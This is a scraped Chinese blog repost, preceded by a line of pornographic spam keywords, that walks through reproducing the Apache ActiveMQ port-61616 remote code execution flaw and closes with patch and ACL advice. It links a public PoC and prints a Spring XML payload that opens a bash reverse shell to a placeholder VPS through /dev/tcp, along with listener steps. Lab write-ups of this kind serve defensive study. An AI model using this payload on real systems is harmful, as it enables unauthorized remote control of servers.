国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

Apache ActiveMQ RCE漏洞復(fù)現(xiàn)

這篇具有很好參考價(jià)值的文章主要介紹了Apache ActiveMQ RCE漏洞復(fù)現(xiàn)。希望對(duì)大家有所幫助。如果存在錯(cuò)誤或未考慮完全的地方,請(qǐng)大家不吝賜教,您也可以點(diǎn)擊"舉報(bào)違法"按鈕提交疑問(wèn)。

Apache ActiveMQ RCE漏洞復(fù)現(xiàn)

1、 產(chǎn)品簡(jiǎn)介

ActiveMQ是一種開(kāi)源的基于JMS(Java Message Servie)規(guī)范的一種消息中間件的實(shí)現(xiàn),ActiveMQ的設(shè)計(jì)目標(biāo)是提供標(biāo)準(zhǔn)的,面向消息的,能夠跨越多語(yǔ)言和多系統(tǒng)的應(yīng)用集成消息通信中間件。ActiveMQ是Apache出品,最流行的,能力強(qiáng)勁的開(kāi)源消息總線。

2、 漏洞概述

Apache ActiveMQ 中存在遠(yuǎn)程代碼執(zhí)行漏洞,Apache ActiveMQ在默認(rèn)安裝下開(kāi)放了61616服務(wù)端口,而該端口并沒(méi)有對(duì)傳入數(shù)據(jù)進(jìn)行適當(dāng)?shù)倪^(guò)濾,從而使攻擊者能夠構(gòu)造惡意數(shù)據(jù)以實(shí)現(xiàn)遠(yuǎn)程代碼執(zhí)行。

3、 影響范圍

Apache ActiveMQ < 5.18.3

Apache ActiveMQ < 5.17.6

Apache ActiveMQ < 5.16.7

Apache ActiveMQ < 5.15.16

4、 漏洞復(fù)現(xiàn)

PoC地址:https://github.com/trganda/ActiveMQ-RCE

把項(xiàng)目Get到本地,導(dǎo)入IDEA中運(yùn)行
Apache ActiveMQ RCE漏洞復(fù)現(xiàn),apache,activemq,web安全
因?yàn)槲译娔X上JDK安裝的是1.8.0,直接運(yùn)行會(huì)發(fā)現(xiàn)報(bào)錯(cuò)

所以在此處安裝JDK11:
Apache ActiveMQ RCE漏洞復(fù)現(xiàn),apache,activemq,web安全

5、 漏洞利用

準(zhǔn)備好惡意文件:rec.xml,將其上傳到自己的VPS,其中將your-ip改成自己vps地址。

<?xml version="1.0" encoding="UTF-8" ?>

<beans xmlns="http://www.springframework.org/schema/beans"

 xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"

 xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">

 <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">

 <constructor-arg>

 <list>

 <value>bash</value>

 <value>-c</value>

 <value><![CDATA[bash -i >& /dev/tcp/your-ip/6666 0>&1]]></value>

 </list>

 </constructor-arg>

 </bean>

</beans>

修改Main.java以下兩處,一個(gè)是目標(biāo)地址,一個(gè)是惡意文件地址
Apache ActiveMQ RCE漏洞復(fù)現(xiàn),apache,activemq,web安全
在vps中使用python開(kāi)啟http服務(wù)
Apache ActiveMQ RCE漏洞復(fù)現(xiàn),apache,activemq,web安全
再使用nc實(shí)現(xiàn)監(jiān)聽(tīng)
Apache ActiveMQ RCE漏洞復(fù)現(xiàn),apache,activemq,web安全
接著運(yùn)行Main.java
Apache ActiveMQ RCE漏洞復(fù)現(xiàn),apache,activemq,web安全
成功反彈shell,ls查看拿到flag
Apache ActiveMQ RCE漏洞復(fù)現(xiàn),apache,activemq,web安全

6、 修復(fù)建議

通過(guò)網(wǎng)絡(luò)ACL策略限制訪問(wèn)來(lái)源,例如只允許來(lái)自特定IP地址或地址段的訪問(wèn)請(qǐng)求。

升級(jí)修復(fù):

Apache ActiveMQ >= 5.18.3

Apache ActiveMQ >= 5.17.6

Apache ActiveMQ >= 5.16.7

Apache ActiveMQ >= 5.15.16文章來(lái)源地址http://www.zghlxwxcb.cn/news/detail-813868.html

到了這里,關(guān)于Apache ActiveMQ RCE漏洞復(fù)現(xiàn)的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來(lái)自互聯(lián)網(wǎng)用戶投稿,該文觀點(diǎn)僅代表作者本人,不代表本站立場(chǎng)。本站僅提供信息存儲(chǔ)空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請(qǐng)注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符,請(qǐng)點(diǎn)擊違法舉報(bào)進(jìn)行投訴反饋,一經(jīng)查實(shí),立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

相關(guān)文章

  • Apache ActiveMQ jolokia 遠(yuǎn)程代碼執(zhí)行漏洞

    Apache ActiveMQ jolokia 遠(yuǎn)程代碼執(zhí)行漏洞

    Apache ActiveMQ是一個(gè)開(kāi)源的消息代理和集成模式服務(wù)應(yīng)用,用于實(shí)現(xiàn)消息中間件,幫助不同的應(yīng)用程序或系統(tǒng)之間進(jìn)行通信。 2023年11月,Apache官方發(fā)布新版本修復(fù)了ActiveMQ中的一個(gè)遠(yuǎn)程代碼執(zhí)行漏洞(CVE-2022-41678),通過(guò)認(rèn)證的攻擊者能夠利用該漏洞獲取服務(wù)器權(quán)限。 該漏洞存

    2024年02月04日
    瀏覽(20)
  • Apache Druid RCE漏洞復(fù)現(xiàn)(QVD-2023-9629)

    Apache Druid RCE漏洞復(fù)現(xiàn)(QVD-2023-9629)

    ? ?Apache Druid是一個(gè)高性能的實(shí)時(shí)大數(shù)據(jù)分析引擎,支持快速數(shù)據(jù)攝取、實(shí)時(shí)查詢和數(shù)據(jù)可視化。它主要用于OLAP(在線分析處理)場(chǎng)景,能處理PB級(jí)別的數(shù)據(jù)。Druid具有高度可擴(kuò)展、低延遲和高吞吐量的特點(diǎn),廣泛應(yīng)用于實(shí)時(shí)監(jiān)控、事件驅(qū)動(dòng)分析、用戶行為分析、網(wǎng)絡(luò)安全等領(lǐng)

    2024年02月05日
    瀏覽(29)
  • 什么是 Apache ActiveMQ?

    ActiveMQ 是一種流行的消息傳遞服務(wù),可促進(jìn)企業(yè)系統(tǒng)中大規(guī)模的不同數(shù)據(jù)。在本 ActiveMQ 教程中,我們概述了 ActiveMQ、它的優(yōu)點(diǎn)、它的工作原理以及何時(shí)應(yīng)該使用它。 什么是 ActiveMQ? ActiveMQ 是一種流行的開(kāi)源消息傳遞服務(wù),它構(gòu)建在 Java 之上。它用作面向消息的中間件 ( MoM

    2024年02月07日
    瀏覽(26)
  • ActiveMQ 任意文件上傳漏洞復(fù)現(xiàn)

    ActiveMQ 任意文件上傳漏洞復(fù)現(xiàn)

    ? 訪問(wèn) http://ip:8161/admin/ 進(jìn)入admin登陸頁(yè)面,使用弱口令登陸,賬號(hào)密碼皆為 admin,登陸成功后,headers中會(huì)出現(xiàn)驗(yàn)證信息 ? 如:? Authorization: Basic YWRtaW46YWRtaW4= ? 訪問(wèn)任意頁(yè)面并抓包,注意headers中的驗(yàn)證信息 ? 將GET協(xié)議修改為PUT協(xié)議,將文件上傳至 fileserver 目錄下 ? 如上

    2024年04月16日
    瀏覽(20)
  • ActiveMQ反序列化漏洞原理+復(fù)現(xiàn)

    ActiveMQ反序列化漏洞原理+復(fù)現(xiàn)

    ActiveMQ反序列化漏洞 ActiveMQ ActiveMQ是開(kāi)源消息總線,消息中間件 工作原理 通過(guò)使用消息隊(duì)列,實(shí)現(xiàn)服務(wù)的異步處理,主要目的是減少請(qǐng)求響應(yīng)時(shí)間和解耦合。 消息隊(duì)列,服務(wù)器A將客戶發(fā)起的請(qǐng)求放入服務(wù)器B的消息隊(duì)列中,服務(wù)器B從消息隊(duì)列中取出并處理。 從以上內(nèi)容中可

    2024年02月05日
    瀏覽(46)
  • 【ActiveMQ】Failed to start Apache ActiveMQ (localhost, ID_XXX)

    在嘗試使用\\\"binwin64activemq.bat\\\"啟動(dòng)apache-activemq-5.18.2時(shí),出現(xiàn)了以下錯(cuò)誤: 錯(cuò)誤原因是由于ActiveMQ無(wú)法將mqtt://0.0.0.0:1883端口綁定,因?yàn)樵摱丝谝呀?jīng)被其他進(jìn)程占用。但是在命令行中輸入以下命令并沒(méi)有返回結(jié)果: 解決方法是修改 confactivemq.xml 文件,找到以下部分: 將端口號(hào)

    2024年02月10日
    瀏覽(18)
  • apache-activemq-5.17.1一鍵安裝安裝

    apache-activemq-5.17.1一鍵安裝安裝

    雙擊InstallService.bat腳本 ?

    2024年02月09日
    瀏覽(21)
  • 【vulhub漏洞復(fù)現(xiàn)】CVE-2016-3088 ActiveMQ任意文件寫入漏洞

    【vulhub漏洞復(fù)現(xiàn)】CVE-2016-3088 ActiveMQ任意文件寫入漏洞

    影響版本:Apache ActiveMQ 5.x~5.14.0 漏洞原理:ActiveMQ中存儲(chǔ)文件的fileserver接口支持寫入文件,但是沒(méi)有執(zhí)行權(quán)限。可以通過(guò)MOVE文件至其他可執(zhí)行目錄下,從而實(shí)現(xiàn)文件寫入并訪問(wèn)。 ActiveMQ在5.12.x~5.13.x版本中,默認(rèn)關(guān)閉了fileserver這個(gè)應(yīng)用(但是可以在conf/jetty.xml中開(kāi)啟);在5

    2024年02月12日
    瀏覽(27)
  • ActiveMQ 反序列化漏洞 (CVE-2015-5254)復(fù)現(xiàn)

    ActiveMQ 反序列化漏洞 (CVE-2015-5254)復(fù)現(xiàn)

    1、Apache ActiveMQ Apache ActiveMQ是Apache軟件基金會(huì)所研發(fā)的一套開(kāi)源的消息中間件,它支持Java消息服務(wù),集群,Spring Framework等。 2、漏洞產(chǎn)生原理 該組件程序造成的漏洞不限制代理中可以序列化的類。遠(yuǎn)程攻擊者可以使一個(gè)特殊的序列化 Java 消息服務(wù) (JMS) ObjectMessage 對(duì)象利用此漏

    2024年02月10日
    瀏覽(21)
  • 框架安全-CVE 復(fù)現(xiàn)&Apache Shiro&Apache Solr漏洞復(fù)現(xiàn)

    框架安全-CVE 復(fù)現(xiàn)&Apache Shiro&Apache Solr漏洞復(fù)現(xiàn)

    中間件及框架列表: IIS,Apache,Nginx,Tomcat,Docker,K8s,Weblogic,JBoos,WebSphere,Jenkins ,GlassFish,Jetty,Jira,Struts2,Laravel,Solr,Shiro,Thinkphp,Spring,F(xiàn)lask,jQuery 等 1、開(kāi)發(fā)框架-PHP-Laravel-Thinkphp 2、開(kāi)發(fā)框架-Javaweb-St2-Spring 3、開(kāi)發(fā)框架-Python-django-Flask 4、開(kāi)發(fā)框架-Javascript-Nod

    2024年02月05日
    瀏覽(48)

覺(jué)得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請(qǐng)作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包